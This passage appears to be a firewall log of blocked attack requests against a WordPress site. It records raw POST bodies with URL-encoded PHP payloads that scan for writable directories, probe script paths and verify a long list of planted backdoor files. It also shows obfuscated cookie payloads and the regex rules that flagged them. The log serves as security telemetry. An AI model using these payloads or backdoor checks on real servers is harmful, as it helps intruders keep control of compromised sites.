D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\ncontent-type:application\/x-www-form-urlencoded\naccept:*\/*\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\ncookie:4=1af844051764377410b827578daae50e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvIJxvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYaOip3DvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-length:3339\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\naccept-encoding:gzip,deflate\n\nUi=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 01:20:51","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> jt:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20","POST \/ HTTP\/1.1\nsec-ch-ua:\"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Google Chrome\";v=\"116\"\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\nsec-ch-ua-platform:\"Windows\"\naccept:*\/*\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/116.0.0.0 Safari\/537.36\nupgrade-insecure-requests:1\nsec-fetch-site:none\nsec-fetch-mode:navigate\nsec-fetch-dest:document\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncookie:4=ce288246c7d2df0454c666077eb603cf; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvnaDvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAfLKAmMKZvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\ncontent-type:application\/x-www-form-urlencoded\ncontent-length:3339\naccept-encoding:gzip,deflate\nsec-fetch-user:?1\nsec-ch-ua-mobile:?0\n\njt=%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_writable%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20check%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%2C%20%24root%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20%24r%20%3D%20%24_SERVER%5B%27DOCUMENT_ROOT%27%5D%3B%20if%20%28is_writable%28%24r%29%29%20%7B%20%20%20%20%20check%28%24r%2C%20%24r%29%3B%20%7D%20scan%28%24r%2C%20%24r%29%3B%20die%28%27%21ended%21%27%29%3B%20"]
["2026-05-16 03:46:03","213.209.159.254","POST","\/","Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> jm:%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B","POST \/ HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\nsec-fetch-mode:navigate\ncontent-type:application\/x-www-form-urlencoded\nsec-fetch-dest:document\nuser-agent:Mozilla\/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/17.2 Mobile\/15E148 Safari\/604.1\ncookie:4=0a64bb21b33726046f335a7dc8ae049c; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvnz0vKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzAfLKAmMKZvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-length:250\nsec-fetch-site:none\n\njm=%3C%3Fphp%20%20%20%24path%20%3D%20%24_SERVER%5B%27SCRIPT_FILENAME%27%5D%3B%20die%28%22%3Cfs%3E%22.filesize%28%24path%29.%22%3C\/fs%3E%3Cp%3E%7B%24path%7D%3C\/p%3E%22%29%3B"]
["2026-05-16 04:01:47","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> Fc:%3C%3Fphp%20%20%20%24r%20%3D%20%27\/www\/wwwroot\/dewenlabels.com%27%3B%20%24x%20%3D%20%5B%22\/wp-includes\/class-wp-widget-factory.php%22%3D%3E%22bd%40%40301749947%40%40%24_COOKIE%5B4%22%2C%0A%22\/wp-blog-header.php%22%3D%3E%22bd%40%40287668532%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-config.php%22%3D%3E%22bd%40%40290180459%40%40%24_COOKIE%5B3%22%2C%0A%22\/wp-includes\/feed.php%22%3D%3E%22bd%40%40320334786%40%40%24_COOKIE%5B8%22%2C%0A%22\/wp-includes\/class-wp-theme.php%22%3D%3E%22bd%40%40320334792%40%4044%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/AEGIS\/zh_CN.php%22%3D%3E%22bd%40%40320334793%40%40621%22%2C%0A%22\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php%22%3D%3E%22bd%40%40320334797%40%4033%22%2C%0A%22\/wp-includes\/class-wp-term.php%22%3D%3E%22bd%40%40320334931%40%40CmArqm%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php%22%3D%3E%22bd%40%40320334934%40%40%24_COOKIE%5B9%22%2C%0A%22\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php%22%3D%3E%22bd%40%40320334937%40%40%24_COOKIE%5B7%22%2C%0A%22\/wp-includes\/sitemaps\/enqpgkz\/gnsdqvi\/idhbwvj\/Validator.php%22%3D%3E%22bd%40%40320334959%40%401009%22%2C%0A%22\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php%22%3D%3E%22bd%40%40320334962%40%401055%22%2C%0A%22\/wp-admin\/includes\/theme.php%22%3D%3E%22bd%40%40320334788%40%40%24_COOKIE%5B5%22%2C%0A%22\/wp-admin\/user\/profile.php%22%3D%3E%22bd%40%40320334783%40%4089%22%2C%0A%22\/wp-includes\/pomo\/mo.php%22%3D%3E%22bd%40%40320334938%40%40HaFMzo%22%2C%0A%22\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php%22%3D%3E%22bd%40%40320334955%40%4033%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php%22%3D%3E%22bd%40%40320334795%40%401056%22%2C%0A%22\/wp-includes\/compat-utf8.php%22%3D%3E%22bd%40%40320334941%40%40fpVGge%22%2C%0A%22\/wp-admin\/site-health.php%22%3D%3E%22bd%40%40301750373%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-includes\/html-api\/class-wp-html-token.php%22%3D%3E%22bd%40%40320334780%40%40etswnK%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Poly1305\/actionscript.php%22%3D%3E%22bd%40%40320334794%40%40924%22%2C%0A%22\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php%22%3D%3E%22bd%40%40320334800%40%401041%22%2C%0A%22\/wp-includes\/class-wp-taxonomy.php%22%3D%3E%22bd%40%40320334573%40%4023%22%2C%0A%22\/wp-includes\/Text\/rmljaqn\/wmqpnar\/gomtqpa\/corp.php%22%3D%3E%22bd%40%40320334958%40%40610%22%5D%3B%20foreach%20%28%24x%20as%20%24p%20%3D%3E%20%24l%29%20%7B%20%20%20%20%20%24f%20%3D%20%22%7B%24r%7D%7B%24p%7D%22%3B%20%20%20%20%20list%28%24t%2C%20%24id%2C%20%24pt%29%20%3D%20explode%28%27%40%40%27%2C%20%24l%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%7D%20%20%20%20%20if%20%28is_numeric%28%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%24fs%20%3D%20filesize%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24fs%20%21%3D%20%24pt%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23bs%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24c%20%3D%20file_get_contents%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%21strstr%28%24c%2C%20%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20die%28%27%21end%21%27%29%3B%20","POST \/wp-includes\/sodium_compat\/src\/Core32\/X25519.php HTTP\/1.1\nsec-fetch-mode:navigate\naccept:*\/*\nsec-fetch-user:?1\nupgrade-insecure-requests:1\nsec-fetch-dest:document\ncookie:4=4718f09e2a2be7b472f3efbae62d97b4; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvEzZvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzEvZy9wo252MKW0VwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\ncontent-length:4899\nsec-ch-ua:\" Not A;Brand\";v=\"99\", \"Chromium\";v=\"100\", \"Google Chrome\";v=\"100\"\ncontent-type:application\/x-www-form-urlencoded\nsec-ch-ua-mobile:?0\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\nsec-ch-ua-platform:\"Windows\"\nsec-fetch-site:none\naccept-encoding:gzip,deflate\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\n\nFc=%3C%3Fphp%20%20%20%24r%20%3D%20%27\/www\/wwwroot\/dewenlabels.com%27%3B%20%24x%20%3D%20%5B%22\/wp-includes\/class-wp-widget-factory.php%22%3D%3E%22bd%40%40301749947%40%40%24_COOKIE%5B4%22%2C%0A%22\/wp-blog-header.php%22%3D%3E%22bd%40%40287668532%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-config.php%22%3D%3E%22bd%40%40290180459%40%40%24_COOKIE%5B3%22%2C%0A%22\/wp-includes\/feed.php%22%3D%3E%22bd%40%40320334786%40%40%24_COOKIE%5B8%22%2C%0A%22\/wp-includes\/class-wp-theme.php%22%3D%3E%22bd%40%40320334792%40%4044%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/AEGIS\/zh_CN.php%22%3D%3E%22bd%40%40320334793%40%40621%22%2C%0A%22\/wp-includes\/Text\/xlesjbk\/kwoqreg\/wvnqbrx\/filelist.php%22%3D%3E%22bd%40%40320334797%40%4033%22%2C%0A%22\/wp-includes\/class-wp-term.php%22%3D%3E%22bd%40%40320334931%40%40CmArqm%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core32\/X25519.php%22%3D%3E%22bd%40%40320334934%40%40%24_COOKIE%5B9%22%2C%0A%22\/wp-includes\/customize\/class-wp-customize-nav-menus-panel.php%22%3D%3E%22bd%40%40320334937%40%40%24_COOKIE%5B7%22%2C%0A%22\/wp-includes\/sitemaps\/enqpgkz\/gnsdqvi\/idhbwvj\/Validator.php%22%3D%3E%22bd%40%40320334959%40%401009%22%2C%0A%22\/wp-includes\/sitemaps\/nthemwz\/lpqfmis\/vgtfqmb\/attack.php%22%3D%3E%22bd%40%40320334962%40%401055%22%2C%0A%22\/wp-admin\/includes\/theme.php%22%3D%3E%22bd%40%40320334788%40%40%24_COOKIE%5B5%22%2C%0A%22\/wp-admin\/user\/profile.php%22%3D%3E%22bd%40%40320334783%40%4089%22%2C%0A%22\/wp-includes\/pomo\/mo.php%22%3D%3E%22bd%40%40320334938%40%40HaFMzo%22%2C%0A%22\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php%22%3D%3E%22bd%40%40320334955%40%4033%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php%22%3D%3E%22bd%40%40320334795%40%401056%22%2C%0A%22\/wp-includes\/compat-utf8.php%22%3D%3E%22bd%40%40320334941%40%40fpVGge%22%2C%0A%22\/wp-admin\/site-health.php%22%3D%3E%22bd%40%40301750373%40%40%24_COOKIE%5B2%22%2C%0A%22\/wp-includes\/html-api\/class-wp-html-token.php%22%3D%3E%22bd%40%40320334780%40%40etswnK%22%2C%0A%22\/wp-includes\/sodium_compat\/src\/Core\/Poly1305\/actionscript.php%22%3D%3E%22bd%40%40320334794%40%40924%22%2C%0A%22\/wp-includes\/Text\/hvsmdki\/1qjzitp\/hbmzirl\/function.debug.php%22%3D%3E%22bd%40%40320334800%40%401041%22%2C%0A%22\/wp-includes\/class-wp-taxonomy.php%22%3D%3E%22bd%40%40320334573%40%4023%22%2C%0A%22\/wp-includes\/Text\/rmljaqn\/wmqpnar\/gomtqpa\/corp.php%22%3D%3E%22bd%40%40320334958%40%40610%22%5D%3B%20foreach%20%28%24x%20as%20%24p%20%3D%3E%20%24l%29%20%7B%20%20%20%20%20%24f%20%3D%20%22%7B%24r%7D%7B%24p%7D%22%3B%20%20%20%20%20list%28%24t%2C%20%24id%2C%20%24pt%29%20%3D%20explode%28%27%40%40%27%2C%20%24l%29%3B%20%20%20%20%20if%20%28%21file_exists%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%7D%20%20%20%20%20if%20%28is_numeric%28%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%24fs%20%3D%20filesize%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24fs%20%21%3D%20%24pt%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23bs%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24c%20%3D%20file_get_contents%28%24f%29%3B%20%20%20%20%20%20%20%20%20if%20%28%21strstr%28%24c%2C%20%24pt%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20print%20%22%3C%24t%3E%7B%24id%7D%23%23d%3C\/%24t%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20die%28%27%21end%21%27%29%3B%20"]
["2026-05-16 04:19:06","213.209.159.254","POST","\/","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36","post","\\$_(GET|post|cookie|files|session|env|phplib|GLOBALS|SERVER)\\[ >> yq:%3C%3Fphp%20%20%20function%20po%28%24p%29%20%7B%20%20%20%20%20%24f%20%3D%20glob%28%24p.DIRECTORY_SEPARATOR.%22%2A.%2A%22%29%3B%20%20%20%20%20if%20%28%21empty%28%24f%29%29%20%7B%20%20%20%20%20%20%20%20%20array_multisort%28array_map%28%27filemtime%27%2C%20%24f%29%2C%20SORT_NUMERIC%2C%20SORT_ASC%2C%20%24f%29%3B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24f%5B0%5D%29%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20return%20filemtime%28%24p%29%3B%20%20%20%20%20%7D%20%7D%20function%20check%28%24p%2C%20%24root%29%20%7B%20%20%20%20%20%24o%20%3D%20po%28%24p%29%3B%20%20%20%20%20%24res%20%3D%20str_replace%28%24root%2C%20%27%27%2C%20%24p%29%3B%20%20%20%20%20print%20%22%3Cd%3E%7B%24res%7D%40%7B%24o%7D%3C\/d%3E%5Cn%22%3B%20%7D%20function%20scan%28%24path%2C%20%24root%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28